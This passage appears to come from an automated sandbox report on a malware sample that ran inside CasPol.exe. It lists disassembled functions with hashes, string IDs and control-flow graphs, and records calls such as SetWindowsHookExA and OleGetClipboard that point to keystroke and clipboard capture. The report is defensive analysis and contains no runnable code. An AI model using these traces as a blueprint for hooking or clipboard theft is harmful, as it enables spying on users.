                                                              • Opcode Fuzzy Hash: 82c3ce7e3c8e858eb2746e520c0b3cff0bb4adc8af56c56fc91747dc584ff848
                                                              • Instruction Fuzzy Hash: D7B15E70E00209DFDF10CFA9D8857ADBBF2BF88704F148229E815A7354DB75A855CB81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 04DAA8D8 Relevance: 2.8, Strings: 2, Instructions: 266COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.577030143.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_4da0000_CasPol.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: xh$xh
                                                              • API String ID: 0-1680090540
                                                              • Opcode ID: 9e6fdd3115cb1b27fb7f2614bc41bf1eaa27c25cb938e71ca8b4216515cea3f3
                                                              • Instruction ID: e7d9d2065fa0ce1c8dd17ff8997cfb21de07a2209135dc85c598551cb6722e13
                                                              • Opcode Fuzzy Hash: 9e6fdd3115cb1b27fb7f2614bc41bf1eaa27c25cb938e71ca8b4216515cea3f3
                                                              • Instruction Fuzzy Hash: 51B15171E00209CFDB10CFA9C98579DBBF2BF48714F248629E415EB354DB74A895CB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 04DA9CC0 Relevance: 2.7, Strings: 2, Instructions: 238COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.577030143.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_4da0000_CasPol.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: xh$xh
                                                              • API String ID: 0-1680090540
                                                              • Opcode ID: 947fbb8375b2b084d5a6b3b7883f2cf7ec3aaf3f882c3ba1060764aa14d5214e
                                                              • Instruction ID: 6caff313d068bac604b725efb3a01bd2fd4908bea555a075976a138ab2e7b64c
                                                              • Opcode Fuzzy Hash: 947fbb8375b2b084d5a6b3b7883f2cf7ec3aaf3f882c3ba1060764aa14d5214e
                                                              • Instruction Fuzzy Hash: FB919EB0E00209CFDF10CFA8C9957DEBBF2BF88714F148969E405A7294DB74A991CB81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 063782BA Relevance: 2.7, Instructions: 2731COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.578260337.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_6370000_CasPol.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e5a8eb287bf8a38610ea6d35b18a233e7ba181827bcbf94f28d2eea3b1d39bc1
                                                              • Instruction ID: 34b66b8b6b55c438c803bfd442be6fb62747cdec5e45153b6f9d95faeb655315
                                                              • Opcode Fuzzy Hash: e5a8eb287bf8a38610ea6d35b18a233e7ba181827bcbf94f28d2eea3b1d39bc1
                                                              • Instruction Fuzzy Hash: 9353F731D10B5A8ACB51EF68C894599F7B1FF99300F15C79AE4587B221EB70AAC4CF81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0637BFF9 Relevance: 2.1, Instructions: 2088COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.578260337.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_6370000_CasPol.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b4069340f62cde7a4a5a21a2bf6318f3fc0463ccd6000cf47ddc18a06d18094e
                                                              • Instruction ID: 497f19f7715743e93c7927724834449b2ede15b0ebda8729812a80714159fadc
                                                              • Opcode Fuzzy Hash: b4069340f62cde7a4a5a21a2bf6318f3fc0463ccd6000cf47ddc18a06d18094e
                                                              • Instruction Fuzzy Hash: 81230B31D10A198ECB11EF68C8945EDF7B1FF99300F14D69AE459B7221EB70AAC5CB81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 064D1848 Relevance: .6, Instructions: 603COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.578397608.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_64d0000_CasPol.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e0fed909d495ee27c2a9c33ac8f2936046dbe16b9f2b289e40110195362a2f14
                                                              • Instruction ID: f8f24186576bdc6b51e87e1796dfaec2298e0d4ed4f71b175fd88bb536aa8ce8
                                                              • Opcode Fuzzy Hash: e0fed909d495ee27c2a9c33ac8f2936046dbe16b9f2b289e40110195362a2f14
                                                              • Instruction Fuzzy Hash: 6B424E30E106198FDB55EFB5C86069EB3F2BFC9300F5086AAD549AB250EF71AD81CB51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0687B0E8 Relevance: .6, Instructions: 599COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.578665147.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_6870000_CasPol.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 400eb248dba9ea8e411381c0b090b1ad396b33d04f13710357e3952e42c36813
                                                              • Instruction ID: e176c31ca69a0ff57a387ca09d57d900a50d1db7ad9933cdcb1d5d48911d9982
                                                              • Opcode Fuzzy Hash: 400eb248dba9ea8e411381c0b090b1ad396b33d04f13710357e3952e42c36813
                                                              • Instruction Fuzzy Hash: FD22A030B101058FDB94DF78D495AAEB7F2EF89314F24846AE506EB361DB35EC418BA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0687E0D0 Relevance: .3, Instructions: 303COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.578665147.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_6870000_CasPol.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: de194fcce5f02013ac26da44ef4246d2e7241b8fd4d735a0d9e7ff5c11fd97d0
                                                              • Instruction ID: 6325680638372b6780d49f0d0dc05c9c66e2bdb58305c71937466f2b21ed7564
                                                              • Opcode Fuzzy Hash: de194fcce5f02013ac26da44ef4246d2e7241b8fd4d735a0d9e7ff5c11fd97d0
                                                              • Instruction Fuzzy Hash: EBA1B131B052688FDB58AB79985937E7BA7FFC4704F08846EE406E7294DE35DC028791
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 064DCDC8 Relevance: .3, Instructions: 276COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.578397608.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_64d0000_CasPol.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f208fa23b6bad91a83401120f6a67914500f85eb7f5fc49fbdaf8f6d60da288b
                                                              • Instruction ID: 07de078fc1ec9ca213073d450b28cd45485d19f1c80a9395cb2129b42937d6cb
                                                              • Opcode Fuzzy Hash: f208fa23b6bad91a83401120f6a67914500f85eb7f5fc49fbdaf8f6d60da288b
                                                              • Instruction Fuzzy Hash: 4E91F271E042158FDF728A68C4E07ABFBA6EF86324F15887BE559DB382C235D841C791
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 063729EC Relevance: .2, Instructions: 233COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.578260337.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_6370000_CasPol.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cf7b09c157a83362a475fe4c9ac11eab61abcd9bf61301d5370b31712c8c22c0
                                                              • Instruction ID: 22823ab413735a164d6f812f05231e29d634bce1dc77b5f8a127a78e737b27d3
                                                              • Opcode Fuzzy Hash: cf7b09c157a83362a475fe4c9ac11eab61abcd9bf61301d5370b31712c8c22c0
                                                              • Instruction Fuzzy Hash: E4917E35E00359DFDB04DBA4D89499DBBBAFF89300F148215F416AB260EB74B945DF90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 06373858 Relevance: .2, Instructions: 219COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.578260337.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_6370000_CasPol.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9e56a9b92913bd1c661d19ec36ea529ac3933ccfcda80dc303bc350ffd9b44a3
                                                              • Instruction ID: 2e67103c235635e20715b55b7942629dd1bd075a8e0dd7a1518be25fc85a5e71
                                                              • Opcode Fuzzy Hash: 9e56a9b92913bd1c661d19ec36ea529ac3933ccfcda80dc303bc350ffd9b44a3
                                                              • Instruction Fuzzy Hash: BF918C75E00349DFCB04DBE0D8949DDBBBAFF8A300B248215F415AB264EB74B985DB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 06374DF8 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 125threadCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • GetCurrentProcess.KERNEL32 ref: 06374E68
                                                              • GetCurrentThread.KERNEL32 ref: 06374EA5
                                                              • GetCurrentProcess.KERNEL32 ref: 06374EE2
                                                              • GetCurrentThreadId.KERNEL32 ref: 06374F3B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.578260337.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_6370000_CasPol.jbxd
                                                              Similarity
                                                              • API ID: Current$ProcessThread
                                                              • String ID: xh
                                                              • API String ID: 2063062207-34918151
                                                              • Opcode ID: e696c92db44376a04f22d102f79e3877a2b866f48c8c5872dee3903e44bd3fbf
                                                              • Instruction ID: a80f9b256cd9f93f60d2f2c903c4ec2305d83075f854cf47f7c0003acc5d3e72
                                                              • Opcode Fuzzy Hash: e696c92db44376a04f22d102f79e3877a2b866f48c8c5872dee3903e44bd3fbf
                                                              • Instruction Fuzzy Hash: 625133B4D002498FDB50CFAAC588BDEBFF0BF88314F208469E019A7650CB75A984CF65
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 06374E08 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120threadCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • GetCurrentProcess.KERNEL32 ref: 06374E68
                                                              • GetCurrentThread.KERNEL32 ref: 06374EA5
                                                              • GetCurrentProcess.KERNEL32 ref: 06374EE2
                                                              • GetCurrentThreadId.KERNEL32 ref: 06374F3B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.578260337.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_6370000_CasPol.jbxd
                                                              Similarity
                                                              • API ID: Current$ProcessThread
                                                              • String ID: xh
                                                              • API String ID: 2063062207-34918151
                                                              • Opcode ID: 38b3a62e4cdb115e7b498c5a48d873d717e8cad210a15b83efdef575a4e23b39
                                                              • Instruction ID: 4bd3cd80289cf1e179c43eaf7d657e2197d27827fd809849bcf636b19664f1e3
                                                              • Opcode Fuzzy Hash: 38b3a62e4cdb115e7b498c5a48d873d717e8cad210a15b83efdef575a4e23b39
                                                              • Instruction Fuzzy Hash: 615133B4D002498FDB50CFAAC588BDEBFF4BF88314F208469E019A7650C775A884CF65
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 06372145 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 148COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 47 6372145-637214c 48 63720e1-6372130 call 6370adc 47->48 49 637214e-63721b6 47->49 56 6372135-6372136 48->56 50 63721c1-63721c8 49->50 51 63721b8-63721be 49->51 54 63721d3-6372272 CreateWindowExW 50->54 55 63721ca-63721d0 50->55 51->50 58 6372274-637227a 54->58 59 637227b-63722b3 54->59 55->54 58->59 63 63722b5-63722b8 59->63 64 63722c0 59->64 63->64 65 63722c1 64->65 65->65
                                                              APIs
                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06372262
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.578260337.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_6370000_CasPol.jbxd
                                                              Similarity
                                                              • API ID: CreateWindow
                                                              • String ID: xh$xh
                                                              • API String ID: 716092398-1680090540
                                                              • Opcode ID: 43b4c6b3f6c97a26d548eccc58fed9b91a0181bfc0b79f024796af678fa50fc7
                                                              • Instruction ID: ae1a427218e90e3257ee02b23a9c89e91c2171f65dfd77164fab926cf844e986
                                                              • Opcode Fuzzy Hash: 43b4c6b3f6c97a26d548eccc58fed9b91a0181bfc0b79f024796af678fa50fc7
                                                              • Instruction Fuzzy Hash: 2E51E1B1C00209AFDF55CFA9C984ACEBFB5FF48300F14812AE908AB220D7759985DF90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 06372150 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 66 6372150-63721b6 67 63721c1-63721c8 66->67 68 63721b8-63721be 66->68 69 63721d3-637220b 67->69 70 63721ca-63721d0 67->70 68->67 71 6372213-6372272 CreateWindowExW 69->71 70->69 72 6372274-637227a 71->72 73 637227b-63722b3 71->73 72->73 77 63722b5-63722b8 73->77 78 63722c0 73->78 77->78 79 63722c1 78->79 79->79
                                                              APIs
                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06372262
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.578260337.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_6370000_CasPol.jbxd
                                                              Similarity
                                                              • API ID: CreateWindow
                                                              • String ID: xh$xh
                                                              • API String ID: 716092398-1680090540
                                                              • Opcode ID: 43720035915389dea97cba607704d561de910ea02c4af0b2133dca7f103afa26
                                                              • Instruction ID: 8d69ccaedfc8ffbdcdd1f3e5d5f7d35da96e78e58ae0d229cb4f3e36d8ecd821
                                                              • Opcode Fuzzy Hash: 43720035915389dea97cba607704d561de910ea02c4af0b2133dca7f103afa26
                                                              • Instruction Fuzzy Hash: E94191B1D10309DFDB54CF99C884ADEBBB5FF48310F64852AE819AB210D775A985CF90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 04DA487C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97libraryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 80 4da487c-4da7567 82 4da75bb-4da7607 LoadLibraryA 80->82 83 4da7569-4da758e 80->83 87 4da7609-4da760f 82->87 88 4da7610-4da7641 82->88 83->82 86 4da7590-4da7592 83->86 90 4da7594-4da759e 86->90 91 4da75b5-4da75b8 86->91 87->88 92 4da7643-4da7647 88->92 93 4da7651 88->93 94 4da75a2-4da75b1 90->94 95 4da75a0 90->95 91->82 92->93 97 4da7649 92->97 99 4da7652 93->99 94->94 98 4da75b3 94->98 95->94 97->93 98->91 99->99
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.577030143.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_4da0000_CasPol.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID: xh$xh
                                                              • API String ID: 1029625771-1680090540
                                                              • Opcode ID: ad673f74175d20f71817b2fca0464ee56658ce767d94f353644373f867f92eb7
                                                              • Instruction ID: 113b1aca0a640995cf5effe3be0e8fbd7434639eb725a695a502ee1542f7c0d9
                                                              • Opcode Fuzzy Hash: ad673f74175d20f71817b2fca0464ee56658ce767d94f353644373f867f92eb7
                                                              • Instruction Fuzzy Hash: 864147B0E002489FDB10DFA9C88979EBBF1FB48314F148529E815AB380D7B4E895CF91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 04DA7504 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 96libraryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 100 4da7504-4da7567 101 4da75bb-4da7607 LoadLibraryA 100->101 102 4da7569-4da758e 100->102 106 4da7609-4da760f 101->106 107 4da7610-4da7641 101->107 102->101 105 4da7590-4da7592 102->105 109 4da7594-4da759e 105->109 110 4da75b5-4da75b8 105->110 106->107 111 4da7643-4da7647 107->111 112 4da7651 107->112 113 4da75a2-4da75b1 109->113 114 4da75a0 109->114 110->101 111->112 116 4da7649 111->116 118 4da7652 112->118 113->113 117 4da75b3 113->117 114->113 116->112 117->110 118->118
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.577030143.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_4da0000_CasPol.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID: xh$xh
                                                              • API String ID: 1029625771-1680090540
                                                              • Opcode ID: aa6b948aeecb305ace5238570711858ab30f7e22a0aab12dd8a95d4428b6ed44
                                                              • Instruction ID: 79dbb4e7c75656b62a608a661d2a0c53f91e1fc1e9cbf51caec490d3be00c00b
                                                              • Opcode Fuzzy Hash: aa6b948aeecb305ace5238570711858ab30f7e22a0aab12dd8a95d4428b6ed44
                                                              • Instruction Fuzzy Hash: E74135B1D006188FDB10CFA9C98979EBBF1FB48304F148529E815AB284D774A486CF91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0687E4F8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 119 687e4f8-687e513 120 687e515-687e53c call 687bfbc 119->120 121 687e53d-687e55c call 687d164 119->121 127 687e562-687e5a6 121->127 128 687e55e-687e561 121->128 133 687e5ae 127->133 134 687e5a8-687e5ab 127->134 135 687e5b6-687e5ba 133->135 136 687e5b0-687e5b5 133->136 134->133 139 687e626-687e654 GlobalMemoryStatusEx 135->139 140 687e5bc-687e5c1 135->140 136->135 141 687e656-687e65c 139->141 142 687e65d-687e685 139->142 143 687e5c7-687e61e 140->143 144 687e5c3-687e5c6 140->144 141->142 143->139
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.578665147.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_6870000_CasPol.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: xh
                                                              • API String ID: 0-34918151
                                                              • Opcode ID: bb4b479fae86cabc6f78051d8b55c55c2ea6330c480664010ab165978e9c92e2
                                                              • Instruction ID: 90fe49b9b5325b43985e844baafe7a8df2baaa0530edcc5568d74add04c0b7ef
                                                              • Opcode Fuzzy Hash: bb4b479fae86cabc6f78051d8b55c55c2ea6330c480664010ab165978e9c92e2
                                                              • Instruction Fuzzy Hash: CF414671E043598FCB11CFA9D8042AEBFF5EF8A320F1581ABD504E7241EB349885CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 06374BEC Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 97COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 149 6374bec-637b464 152 637b514-637b534 call 637274c 149->152 153 637b46a-637b46f 149->153 160 637b537-637b544 152->160 155 637b4c2-637b4fa CallWindowProcW 153->155 156 637b471-637b4a8 153->156 158 637b503-637b512 155->158 159 637b4fc-637b502 155->159 162 637b4b1-637b4c0 156->162 163 637b4aa-637b4b0 156->163 158->160 159->158 162->160 163->162
                                                              APIs
                                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 0637B4E9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.578260337.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_6370000_CasPol.jbxd
                                                              Similarity
                                                              • API ID: CallProcWindow
                                                              • String ID: xh
                                                              • API String ID: 2714655100-34918151
                                                              • Opcode ID: be26de04bab3b70e440fbbf0276645331c6860b561afbf05a9c84a9b65e5b254
                                                              • Instruction ID: 74dc066d3cee29fc638bdda70c9ad13aec4df128999d59165f5089fab5215a28
                                                              • Opcode Fuzzy Hash: be26de04bab3b70e440fbbf0276645331c6860b561afbf05a9c84a9b65e5b254
                                                              • Instruction Fuzzy Hash: 854117B59002458FDB50CF99C488AAEFBF5FF88314F248459D519AB321D374A845CFA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0637EA0C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 74comclipboardCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 166 637ea0c-637ea68 167 637ea72-637eab0 OleGetClipboard 166->167 168 637eab2-637eab8 167->168 169 637eab9-637eb07 167->169 168->169 174 637eb17 169->174 175 637eb09-637eb0d 169->175 177 637eb18 174->177 175->174 176 637eb0f 175->176 176->174 177->177
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.578260337.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_6370000_CasPol.jbxd
                                                              Similarity
                                                              • API ID: Clipboard
                                                              • String ID: xh
                                                              • API String ID: 220874293-34918151
                                                              • Opcode ID: a1ddd871a1f19a04de70db816d41586d8213acc66bee90f60207aaaa273bbbd4
                                                              • Instruction ID: 409e0995a224f73728e30d3fbfad320ce64d5e0205c67db0ce775da69f5db344
                                                              • Opcode Fuzzy Hash: a1ddd871a1f19a04de70db816d41586d8213acc66bee90f60207aaaa273bbbd4
                                                              • Instruction Fuzzy Hash: 9531F3B0D10318DFDB60CF99C984BDEBBF1BF48314F248059E405AB290D778A949CBA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0637EA18 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 71comclipboardCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 178 637ea18-637eab0 OleGetClipboard 180 637eab2-637eab8 178->180 181 637eab9-637eb07 178->181 180->181 186 637eb17 181->186 187 637eb09-637eb0d 181->187 189 637eb18 186->189 187->186 188 637eb0f 187->188 188->186 189->189
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.578260337.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_6370000_CasPol.jbxd
                                                              Similarity
                                                              • API ID: Clipboard
                                                              • String ID: xh
                                                              • API String ID: 220874293-34918151
                                                              • Opcode ID: 10cb24fb29928bcd9a34cc374cc7050800f5f8db62ff83fc4510f20a513bd7b4
                                                              • Instruction ID: 58c13deba17a5d944cec86f8273313d7fe465de3bbf69acd32a6f765bc3b62c3
                                                              • Opcode Fuzzy Hash: 10cb24fb29928bcd9a34cc374cc7050800f5f8db62ff83fc4510f20a513bd7b4
                                                              • Instruction Fuzzy Hash: EA31C3B0D01259DFDB60CF99C984BCDBBF5BF48314F248059E405BB290D778A945CBA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 06375F81 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 190 6375f81-6375f82 191 6375f88-637601c DuplicateHandle 190->191 192 6376025-6376042 191->192 193 637601e-6376024 191->193 193->192
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0637600F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.578260337.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_6370000_CasPol.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID: xh
                                                              • API String ID: 3793708945-34918151
                                                              • Opcode ID: 7b4f3680cd6cb772580703187d0aa074dfa206d90d604ef874b9e02b0ea90455
                                                              • Instruction ID: 3c63da0c309c5903c34b865934df7406e37cc869efca7e02e74e637af2416edc
                                                              • Opcode Fuzzy Hash: 7b4f3680cd6cb772580703187d0aa074dfa206d90d604ef874b9e02b0ea90455
                                                              • Instruction Fuzzy Hash: BA21E4B5D002099FDB10CFAAD984ADEBFF4FB48320F14841AE914A7310D378A944DFA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 06375F88 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 62COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 196 6375f88-637601c DuplicateHandle 197 6376025-6376042 196->197 198 637601e-6376024 196->198 198->197
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0637600F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.578260337.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_6370000_CasPol.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID: xh
                                                              • API String ID: 3793708945-34918151
                                                              • Opcode ID: 705e03273f4233d0b3c55ed0a56c1a3ead61f89a8c7dd9aff18c008d59b69f08
                                                              • Instruction ID: 35fb3b53a8b12b24f8e51274e0edd6077add3365283ee3d11f23496bb078f287
                                                              • Opcode Fuzzy Hash: 705e03273f4233d0b3c55ed0a56c1a3ead61f89a8c7dd9aff18c008d59b69f08
                                                              • Instruction Fuzzy Hash: 0D21C4B5D002099FDB10CF9AD984ADEBFF4EB48320F14841AE915A7310D378A944DFA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 064D2150 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 61COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 201 64d2150-64d21a2 204 64d21ae-64d21e0 SetWindowsHookExA 201->204 205 64d21a4-64d21ac 201->205 206 64d21e9-64d2209 204->206 207 64d21e2-64d21e8 204->207 205->204 207->206
                                                              APIs
                                                              • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 064D21D3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.578397608.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_64d0000_CasPol.jbxd
                                                              Similarity
                                                              • API ID: HookWindows
                                                              • String ID: xh
                                                              • API String ID: 2559412058-34918151
                                                              • Opcode ID: 8f11ce4c6dd8dee989b9c6d4d027525a07bbfacd667092427a17e3dc4371d9bd
                                                              • Instruction ID: 1847e97447f1bbf595459b47a54c4f2723af7827023c51de008528ee9074430e
